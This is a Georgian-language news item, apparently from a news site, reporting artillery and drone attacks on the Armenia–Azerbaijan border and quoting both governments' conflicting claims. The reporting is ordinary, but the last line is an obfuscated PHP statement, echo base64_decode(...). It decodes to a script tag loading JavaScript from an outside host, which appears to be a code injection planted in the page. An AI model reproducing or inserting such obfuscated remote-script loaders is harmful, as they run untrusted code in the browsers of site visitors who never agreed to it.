celsiusi
ავერსი საქკაბელი
სომხეთ-აზერბაიჯანის საზღვარზე სროლის ხმა ისმის. ინფორმაციას ადგილობრივებზე დაყრდნობით უცხოური მედიასაშუალებები ავრცელებენ. 
 
გამოცემა ANCA სომხურ მედიაზე დაყრდნობით წერს, რომ არსებული ინფორმაციით, დაიბომბა სომხეთის ქალაქები, ვარდენი და ჯერმუკი. ასევე, აფეთქებების ხმები ისმის გორისთან და სოფელ ტატევთან. 
 
გამოცემა Труха კი ტელეგრამის საკუთარ არხზე ავრცელებს საზღვარზე მიმდინარე სროლების ვიდეოს და აზერბაიჯანის ხელისუფლებაზე დაყრდნობით წერს, რომ: "სომხეთმა დაიწყო ფართომასშტაბიანი პროვოკაცია აზერბაიჯანის შეიარაღებული ძალების წინააღმდეგ, ისინი კი იძულებულები გახდნენ, საპასუხოდ ინტენსიური ცეცხლი გაეხსნათ".
 
მედია ასევე წერს, რომ სომხეთის თავდაცვის სამინისტრო ადასტურებს, რომ 13 სექტემბერს, 00:05 საათზე, აზერბაიჯანის შეიარაღებული ძალების ნაწილებმა არტილერიიდან და მსხვილკალიბრიანი ქვემეხებიდან სომხური პოზიციების ინტენსიური დაბომბვა დაიწყეს გორისის, სოტკისა და ჯერმუქის მიმართულებით. მათივე ცნობით, აზერბაიჯანი უპილოტო საფრენ აპარატებსაც იყენებს. 
429
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");